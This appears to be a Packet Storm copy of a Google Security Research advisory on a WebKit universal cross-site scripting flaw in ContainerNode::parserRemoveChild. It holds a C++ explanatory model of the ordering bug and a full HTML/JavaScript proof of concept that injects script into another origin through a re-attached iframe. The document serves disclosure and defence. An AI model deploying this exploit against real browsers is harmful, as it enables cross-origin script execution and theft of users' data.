WebKit ContainerNode::parserRemoveChild (2) Universal Cross Site Scripting

2017-05-25T00:00:00
ID PACKETSTORM:142663
Type packetstorm
Reporter Google Security Research
Modified 2017-05-25T00:00:00

Description

WebKit: UXSS via ContainerNode::parserRemoveChild (2)

Here's a snippet of ContainerNode::parserRemoveChild.  
  
void ContainerNode::parserRemoveChild(Node& oldChild)
{
    disconnectSubframesIfNeeded(*this, DescendantsOnly); <<---- (a)
    ...
    document().notifyRemovePendingSheetIfNeeded(); <<---- (b)
}
  
Subframes are detached at (a). But |notifyRemovePendingSheetIfNeeded| at (b) fires a focus event, and from the focus handler we can attach subframes again.
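To make the ordering problem concrete, here is a simplified C++ model written for this page (not WebKit code): a removal routine that detaches subframes and then runs a notification hook able to execute script, beside a variant that re-establishes the "no subframes below the removed node" invariant before returning. The node layout, the hook type and the hardening shown are assumptions for illustration, not the actual WebKit patch.

```cpp
// Simplified model of the ordering bug described above (not WebKit code).
#include <functional>
#include <vector>

struct Node {
    std::vector<Node*> children;
    bool hasSubframe = false;   // models an attached <iframe> at this node
};

// Models disconnectSubframesIfNeeded(node, DescendantsOnly): detach every
// subframe strictly below `n`.
static void disconnectSubframes(Node& n) {
    for (Node* c : n.children) {
        c->hasSubframe = false;
        disconnectSubframes(*c);
    }
}

// Counts subframes still attached below `n`; after removal this must be 0.
static int countSubframes(const Node& n) {
    int total = 0;
    for (const Node* c : n.children)
        total += (c->hasSubframe ? 1 : 0) + countSubframes(*c);
    return total;
}

// Stand-in for notifyRemovePendingSheetIfNeeded(): it may run page script
// (the focus handler in the PoC), which can mutate the tree at will.
using ScriptHook = std::function<void(Node&)>;

// Vulnerable ordering: subframes are detached at (a), then script runs at (b)
// and may attach a new subframe below the node being removed.
static int parserRemoveChildVulnerable(Node& parent, Node& oldChild,
                                       const ScriptHook& hook) {
    disconnectSubframes(parent);          // (a)
    hook(oldChild);                       // (b) re-entrant script
    return countSubframes(oldChild);      // invariant violated if > 0
}

// Illustrative hardening (assumed, not WebKit's fix): the invariant must hold
// at return, so the detach is repeated after the last point script can run.
static int parserRemoveChildHardened(Node& parent, Node& oldChild,
                                     const ScriptHook& hook) {
    disconnectSubframes(parent);          // (a)
    hook(oldChild);                       // (b) script may still run here...
    disconnectSubframes(oldChild);        // ...so re-establish the invariant
    return countSubframes(oldChild);      // always 0
}
```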
  
PoC:  
<html>
<head>
</head>
<body>
<script>

let xml = `
<body>
<div>

<p>
<script>
let p = document.querySelector('p');
let link = p.appendChild(document.createElement('link'));
link.rel = 'stylesheet';
link.href = 'data:,aaaaazxczxczzxzcz';

let btn = document.body.appendChild(document.createElement('button'));
btn.id = 'btn';
btn.onfocus = () => {
    btn.onfocus = null;

    window.d = document.querySelector('div');
    window.d.remove();

    link.remove();
    document.body.appendChild(p);

    let m = p.appendChild(document.createElement('iframe'));
    setTimeout(() => {
        document.documentElement.innerHTML = '';

        m.onload = () => {
            m.onload = null;

            m.src = 'javascript:alert(location);';
            var xml = \`
<svg xmlns="http://www.w3.org/2000/svg">
<script>
document.documentElement.appendChild(parent.d);
</sc\` + \`ript>
<element a="1" a="2" />
</svg>\`;

            var tmp = document.documentElement.appendChild(document.createElement('iframe'));
            tmp.src = URL.createObjectURL(new Blob([xml], {type: 'text/xml'}));
        };
        m.src = 'https://abc.xyz/';
    }, 0);
};

location.hash = 'btn';
</scrip` + `t>

</p>
</div>
</body>`;

let tf = document.body.appendChild(document.createElement('iframe'));
tf.src = URL.createObjectURL(new Blob([xml], {type: 'text/html'}));

</script>
</body>
</html>
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: lokihardt  
  